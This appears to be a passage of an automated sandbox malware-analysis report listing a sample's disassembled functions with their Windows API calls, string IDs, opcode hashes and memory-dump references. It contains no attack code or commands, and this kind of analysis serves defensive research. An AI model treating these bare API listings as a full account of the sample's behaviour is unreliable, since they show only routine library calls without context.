                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF410572904204BADB15B765AD06FFF7BECEF41710F14602AFA0CF61C2EA759A0193A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00ED3C1F
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00ED3C40
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 2948472770-3080491070
                                                                                                                                                                                                                                      • Opcode ID: 42a3b17d26a6495207e50593819228c16e0fa2120b872c9e1c0d2a93e0951308
                                                                                                                                                                                                                                      • Instruction ID: d5ee8401033dae893c782b628e2e5b24665b7a113d33b9d4453902abb0b6ac21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42a3b17d26a6495207e50593819228c16e0fa2120b872c9e1c0d2a93e0951308
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51EF32940219AACB14FBE0ED42EEEB7B9EF18344F101065B10972162EB356F5DDF62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ED5BF0
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ED5C66
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00ED5C70
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00ED5CF7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                      • Opcode ID: ae06cbeb2cd8e6d5ff7753eeb0b7f13998922065efd946a0f2724f8e5d151baf
                                                                                                                                                                                                                                      • Instruction ID: a3ead8b6275f7cd1b97a367020f5664c550eea3fd752071d3c73b0cb5fab3bee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae06cbeb2cd8e6d5ff7753eeb0b7f13998922065efd946a0f2724f8e5d151baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B31A036A047049FD710DF68D884AAABBB4EF45348F14905AE406EB3A2D731ED47CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateMenu.USER32 ref: 00EF44DE
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00EF44ED
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF4575
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00EF4589
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00EF4593
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF45C0
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00EF45C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                      • Opcode ID: 793f0cebb60facfe12f581002d4aa0a08065399bbbcb1363194d97def0fd64dd
                                                                                                                                                                                                                                      • Instruction ID: 8b3fca8e860aa2036ac9c7d77d0896f3078d29da5f66ede38a75e0720491a49b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 793f0cebb60facfe12f581002d4aa0a08065399bbbcb1363194d97def0fd64dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 454159B5605209EFDB14EF65D844ABA7BB6FF49314F140028FA55BB390DB30A914DF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00EC25EE
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EC25F9
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC2615
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC2618
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EC2621
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EC2635
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC2638
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 08f68d3c1a972501bb42b9c5b800a3b292a1d4d5f90b12e2fb10167eb4994a3a
                                                                                                                                                                                                                                      • Instruction ID: 6bc5fba0126ff18e33aac084ade291b80bfd07adc418415ccfdf5f6d4feb33ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08f68d3c1a972501bb42b9c5b800a3b292a1d4d5f90b12e2fb10167eb4994a3a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D2103B0D00118BFCF00ABA0CC95EEEBBB9EF45340F00515AB951B72A1CB35880ADB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00EC26CD
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00EC26D8
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00EC26F4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC26F7
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EC2700
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EC2714
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC2717
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 2573188126-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 31d07abd1cd3823377bb93f7b486b2c582f530226758cdc52d90b3d70c3d873f
                                                                                                                                                                                                                                      • Instruction ID: 992bb4837658685319d217953ebbc33525fef8ea1e6ce2ef4f9352c40d0db5b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31d07abd1cd3823377bb93f7b486b2c582f530226758cdc52d90b3d70c3d873f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1121C5B4D40214BFCF01ABA4DC85FEEBBB9EF05340F00505AB951B7195CB768919DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE44B5
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EE44E3
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EE44ED
                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00EE460A
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE472E
                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EE4767
                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00F00B80,?), ref: 00EE4786
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EE4799
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE481D
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE4831
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                                                                                      • Opcode ID: 81a3a3b6f2810d56c0a67a4915b264f49e9fc45812b3899ea495f3613a7d3878
                                                                                                                                                                                                                                      • Instruction ID: 1bec4ecfef4114946b9f7d1883f8d064b577f11f5f50ff0a95a83a40d6870b99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81a3a3b6f2810d56c0a67a4915b264f49e9fc45812b3899ea495f3613a7d3878
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EC157B16083459FC700DF69C88496BBBE9FF89748F00591DF59AAB290DB30ED05CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00EFA7E8
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00EFA7FF
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EFA80B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00EFA821
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00EFAA6D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFAA8B
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFAAAC
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00EFAACB
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFAAED
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 00EFAB13
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3962739598-0
                                                                                                                                                                                                                                      • Opcode ID: 11a2f9fa9b93e246087e04aad7f8cc0cd9db917170a76475c7d51e6066ed3d97
                                                                                                                                                                                                                                      • Instruction ID: 4509f0bf3a80d34d3c593d5a55fb00aff6ad3d64f8d193444ac55edda5d0dcd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11a2f9fa9b93e246087e04aad7f8cc0cd9db917170a76475c7d51e6066ed3d97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BB199B0600619DFCF14CF29C9847BE7BB2BF84704F199079EE49AE295D770A984CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF4302
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF4305
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF432C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF434F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF43C7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EF4411
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EF442C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00EF4447
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00EF445B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00EF4478
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                      • Opcode ID: 09c7ff795048f116a60f01514da9e39f0c9742c856e69c0f2fca56facf942a97
                                                                                                                                                                                                                                      • Instruction ID: f6760e69b82278a7bb533e13746d171ad5e21365e56df9a6ea825ecba94c7f85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c7ff795048f116a60f01514da9e39f0c9742c856e69c0f2fca56facf942a97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D6156B1A00208AFDB11DFA8CC81FFEB7F9AB49714F104059FA15B72A1D770AA41DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ECB807
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB81B
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00ECB822
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB831
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECB843
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB85C
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB86E
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB8B3
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB8C8
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ECA894,?,00000001), ref: 00ECB8D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                      • Opcode ID: 5b6902c8f221403351a7f534b5bd1c5efc669ea877b3417186f7bf16512f02e3
                                                                                                                                                                                                                                      • Instruction ID: 8d8e936580b291cd9f769c0b702aa46f8b4d66caef8c74236848f85b1ae75638
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b6902c8f221403351a7f534b5bd1c5efc669ea877b3417186f7bf16512f02e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B431BFB290020AEFDB18DB35DD46FAD7BBEAB84325F11401AF814E7190D7799E45CB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                      • API String ID: 0-1603158881
                                                                                                                                                                                                                                      • Opcode ID: 80cfb3f4636de3580f85fd83c81f110b84d9ad97c65b8be23001f178f0f7be0d
                                                                                                                                                                                                                                      • Instruction ID: 632d59781e6b4a450e0f17376e8eed8b8d13caf2de28de046ee4e4b312cf1d02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80cfb3f4636de3580f85fd83c81f110b84d9ad97c65b8be23001f178f0f7be0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE1C232A006169ACB189F78C641FEDFBB1BF54714F10E11EE45AF7290DB31AE4697A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00ED1A26
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00ED1A4E
                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00ED1A72
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00ED1AA2
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00ED1B29
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00ED1B8E
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00ED1BFA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                      • String ID: WS
                                                                                                                                                                                                                                      • API String ID: 2550207440-3785010769
